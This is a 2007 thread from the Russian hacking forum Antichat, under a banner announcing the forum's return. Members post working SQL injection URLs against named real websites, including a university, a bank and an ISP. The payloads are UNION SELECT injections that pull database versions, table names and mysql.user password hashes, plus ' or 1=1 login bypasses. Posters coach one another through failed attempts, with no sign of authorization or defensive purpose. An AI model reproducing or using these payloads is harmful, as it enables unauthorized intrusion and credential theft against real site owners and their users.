Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.08.2007, 06:51
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://p-pm.net/partners/?p=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
подобрал число колонок в таблице (13)
пробовал дальше так как описано в мануалах - ничео не смог вытащить. мож у кого другого получится? (скинул в асю знакомый на сайт с и-нет заработком, а я решил на sql ошибки проверить)
Последний раз редактировалось Calcutta; 09.08.2007 в 06:56..
|
|
|
09.08.2007, 08:27
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
Сообщение от SWAT
Код:
http://www.mountainx.com/greenbuilding/listings.php?catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,VERSION(),13,14,15,16,17/*
http://www.mountainx.com/greenbuilding/listings.php?catid=-1+union+select+database(),user(),3,4,5,6,user(),8, 9,10,11,VERSION(),13,14,15,16,17/*
если честно, я не знаю толком что это, просто пытался освоить принцип перебора занваний полей 
|
|
|
|
09.08.2007, 12:06
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
.EDU
http://siovizcenter.ucsd.edu/library/objects/detail.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24/*
|
|
|
|
09.08.2007, 13:50
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
http://bin.ru/office_location.php?office_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,table_na me,14,AES_DECRYPT(AES_ENCRYPT(version(),%20%200x71 ),0x71),16,17,18,19+from+information_schema.tables +limit+1,1/*
http://www.yaruse.ru/main.php?page=cvetmet&top=-1+union+select+CONCAT(user,CHAR(32,124,124,32),pas sword),2,3,4,5,6+from+mysql.user/*
http://hns.cm.ru/ доступ к форуму и партнерам:
' or 'a'='a
Последний раз редактировалось x.Elf; 09.08.2007 в 14:10..
|
|
|
|
09.08.2007, 14:08
|
|
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286
Репутация:
187
|
|
http://www.wanderinggoblin.com/literaturedetail.php?id=430%20union%20select%201,2 ,3,concat(version(),char(58),user(),char(58),datab ase(),char(58),password,char(58),user),5,6%20from% 20mysql.user/*
Последний раз редактировалось kair; 09.08.2007 в 14:19..
|
|
|
|
09.08.2007, 15:26
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
БАНК
http://www.moneyburg.ru/
Надо поглубже его проанализировать конечно:
Вход :
login:1' or 1=1/*
pass:неважно
ПРОВАЙДЕР
uralsmart.ru
Опять таки mssql.
Я вижу что скл ругается ......еще вижу строки логин пасс и ввожу запрос типа:
' or 'a'='a
" or 1=1--
or 1=1--
а тока ругается -ХЕЛП
ну и еще:
http://www.chermet-s.ru/mess/?i=1&ii=-1+union+select+1,VERSION(),table_name,4,5,6,7,8+fr om+information_schema.tables/*
Последний раз редактировалось x.Elf; 09.08.2007 в 15:37..
|
|
|
|
09.08.2007, 15:45
|
|
Участник форума
Регистрация: 11.01.2007
Сообщений: 125
Провел на форуме:
868251
Репутация:
27
|
|
и вот опять чо то не выходт...
http://journalism.berkeley.edu/events/details.php?ID=394'+union+select+1,2,3,4,5,6,7,8/*
|
|
|
|
09.08.2007, 15:52
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
Сообщение от Barney
и вот опять чо то не выходт...
http://journalism.berkeley.edu/events/details.php?ID=394'+union+select+1,2,3,4,5,6,7,8/*
http://journalism.berkeley.edu/events/details.php?ID=394+union+select+1,2,3,4,5,6,7,8,9, version(),11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52,53,54/*
имена таблиц сам подбирай.....
|
|
|
|
09.08.2007, 17:01
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Вот есть такое
_http://ksvu.kiev.ua/viewabc.php?letter=0'+UNION+SELECT+1,2,3,4,version (),6,7,8,9,10/*
С MySQL inj работать особо неумею, пробовал подбирать имена таблиц (наверное неправельно) не получилось... Кто может, помогите... Пасиб!
|
|
|
|
09.08.2007, 17:25
|
|
Познающий
Регистрация: 24.05.2007
Сообщений: 38
Провел на форуме:
114515
Репутация:
29
|
|
Сообщение от Ponchik
Вот есть такое
_http://ksvu.kiev.ua/viewabc.php?letter=0'+UNION+SELECT+1,2,3,4,version (),6,7,8,9,10/*
С MySQL inj работать особо неумею, пробовал подбирать имена таблиц (наверное неправельно) не получилось... Кто может, помогите... Пасиб!
http://ksvu.kiev.ua/viewabc.php?letter=-1'+union+select+1,version(),3,4,5,6,7,8,9,10+from+ guestbook/*
http://ksvu.kiev.ua/viewabc.php?letter=-1'+union+select+1,version(),3,4,3,6,7,8,9,10+from+ forum/*
Версия мускула четвертая а это уже само по себе геморой..............
Вот тебе пара таблиц а имена полей и другие таблицы ты уже сам...
Последний раз редактировалось x.Elf; 09.08.2007 в 17:37..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
